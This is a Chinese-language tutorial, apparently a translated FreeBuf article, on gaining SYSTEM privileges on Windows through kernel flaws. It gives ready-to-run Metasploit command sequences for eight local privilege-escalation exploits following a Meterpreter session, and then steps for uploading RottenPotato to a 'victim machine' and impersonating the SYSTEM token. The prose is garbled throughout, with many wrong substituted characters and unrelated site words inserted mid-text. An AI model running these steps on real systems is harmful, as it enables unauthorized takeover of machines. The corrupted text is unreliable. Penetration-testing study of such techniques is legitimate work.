PS. 原文僅限於技巧計劃，嚴禁用於其餘用途。

繼上一篇“運用自動化足原舉行Windows提權”，原文將引見有閉Windows核心馬足提權的方式。爾將運用內建的Metasploit模組動作演練。經過原文的進修，你將領會體系的哪些區域性可被運用，並配合最佳可運用模組進一步的提高權力。

Windows-Exploit-suggester

Metasploit內建模組供給了百般可用於提權的local exploits，並會鑑於架構，平臺（即運轉的操縱體系），會話典型和所需默許選項供給提議。這極大的節約了咱們的時候，省去了咱們手動搜尋local exploits的煩惱。雖說如許，但是也並非一切列出的local exploits都可用。所以，不管是馬足運用仍舊查詢最佳的措施便是自動聯合手動。 

用法

注：要運用local exploit suggester，咱們必需已在目的呆板上獲得到了一個Meterpreter session。在運轉Local Exploit suggester之前，咱們須要將現有的Meterpreter session調到後盾運轉（CTRL + Z）

示例，假如咱們暫時有一個Meterpreter session 1

use post/multi/recon/local_exploit_suggester set LHOST 192.168.1.107 set SESSION 1 exploit

如下圖所示，它自動的為咱們配合出了一些大概的用於易受進犯目的提權的馬足運用模組。

​

Windows ClientCopyImage Win32k Exploit

Windows核心形式啟動步調特權提高馬足。此模組運用了win32k.sys核心形式啟動步調中的不精確對於象處置舉行提權。xise

該模組已在Windows 7 x64和x86，Windows 2008 R2 SP1 x64的易受進犯版原上舉行了嘗試。

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms15_051_client_copy_image set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

Windows TrackPopupMenu Win32k NULL指標解引用

此模組運用了win32k.sys中的NULL指標解引用，馬足可經過TrackPopupMenu函式舉行觸發。在特別狀況下，咱們不妨亂用在xxxSendMessageTimeout上的NULL指標解引用，來實行任性程式碼實行操縱。

該模組已在Windows XP SP3，Windows Server 2003 SP2，Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上舉行了嘗試。

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms14_058_track_popup_menu set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

經過KiTrap0D提高Windows權力

此模組將經過KiTrap0D exploit創造具備SYSTEM權力的新會話，假如暫時運用的會話權力已提高，則exploit將不會運轉。該模組依靠於kitrap0d.x86.dll，因此在x64版原的Windows上不受支援。

該模組已在32位的Windows Server 2003，Windows Server 2008，Windows 7和XP易受進犯版原上舉行了嘗試。全集網

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms10_015_kitrap0d set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

Task Scheduler XML提權

此馬足爆發在Task Scheduler中，可答運使用者提高權力。假如進犯者登入到受作用的體系，並運轉特製運用步調，則該馬足大概答應特權提高。進犯者必需具有靈驗的登入把柄，而且不妨在原地登入才華勝利運用此馬足。長途或者匿名使用者則無法運用此馬足。

該模組已在Windows Vista，Windows 7，Windows Server 2008 x64和x86的易受進犯版原上舉行了嘗試。BT天堂

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms10_092_schelevator set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

MS16-016 mrxdav.sys WebDav原地提權

此模組運用了mrxdav.sys中的馬足。其將在目的體系天生一個過程，並在實行payload之前將其權力提高到NT AUTHORITY\SYSTEM。

該模組已在Windows 7 SP1，x86架構的易受進犯版原上舉行了嘗試。

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms16_016_webdav set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

EPATHOBJ::pprFlattenRec原地提權

此模組運用了EPATHOBJ :: pprFlattenRec上的馬足，其重要問題出在運用了未初始化的資料（即答應破壞記憶體）。

暫時，該模組已在Windows XP SP3，Windows 2003 SP1和Windows 7 SP1上勝利舉行了嘗試。

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ppr_flatten_rec set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

MS13-053 : NTUserMessageCall Win32k核心池溢位

Win32k中的核心池溢位馬足，可答應原地使用者提權。核心shellcode使winlogon.exe過程的ACL為NULL（SYSTEM過程）。這將答應所有非特權過程自在遷徙到winlogon.exe，進而提高使用者權力。注重：退出meterpreter會話時，大概會引導winlogon.exe分化。

暫時，該模組已在Windows 7 SP1 x86上勝利嘗試。

讓咱們轉到MSF統制臺並實行該馬足的exploit模組

use exploit/windows/local/ms13_053_ schlamperei set lhost 192.168.1.107 set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

MS16-032 Secondary Logon Handle提權

此模組運用了Windows Secondary Logon Service中缺乏尺度控制代碼過濾的問題。該馬足重要作用Windows 7-10和2k8-2k12 32/64位版原。此模組僅實用於具備Powershell 2.0或者更高版原的Windows體系，以及具備起碼二個或者以上CPU核心的體系。

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc set session 1 exploit

一朝exploit勝利實行，便會挨啟另一個Meterpreter session

getsystem getuid

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

RottenPotato

運用RottenPotato將效勞帳戶原地提權至SYSTEM。

最先，咱們在meterpreter會話中運用以下選項察瞅暫時體系上能否存留所有靈驗tokens。

load incognito
list_token -u

不妨瞅到，暫時並不所有token可用。

暫時，咱們從github下載Rottenpotato。

git clone https://github.com/foxglovesec/RottenPotato.git cd RottenPotato

下載完畢後咱們會在Rottenpotato目次下，瞅到一個rottenpotato.exe文獻。

將該文獻上傳至遇害者呆板。

upload /root/Desktop/RottenPotato/rottenpotato.exe .

而後，鍵入以下吩咐實行該exe文獻，並將SYSTEM token增添到impersonate user tokens下。

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

不妨瞅到，咱們暫時的使用者權力已提高為了NT AUTHORITY\SYSTEM

​

*參照根源：hackingarticles，FB小編 secist 編譯，轉載請證明來自FreeBuf.COM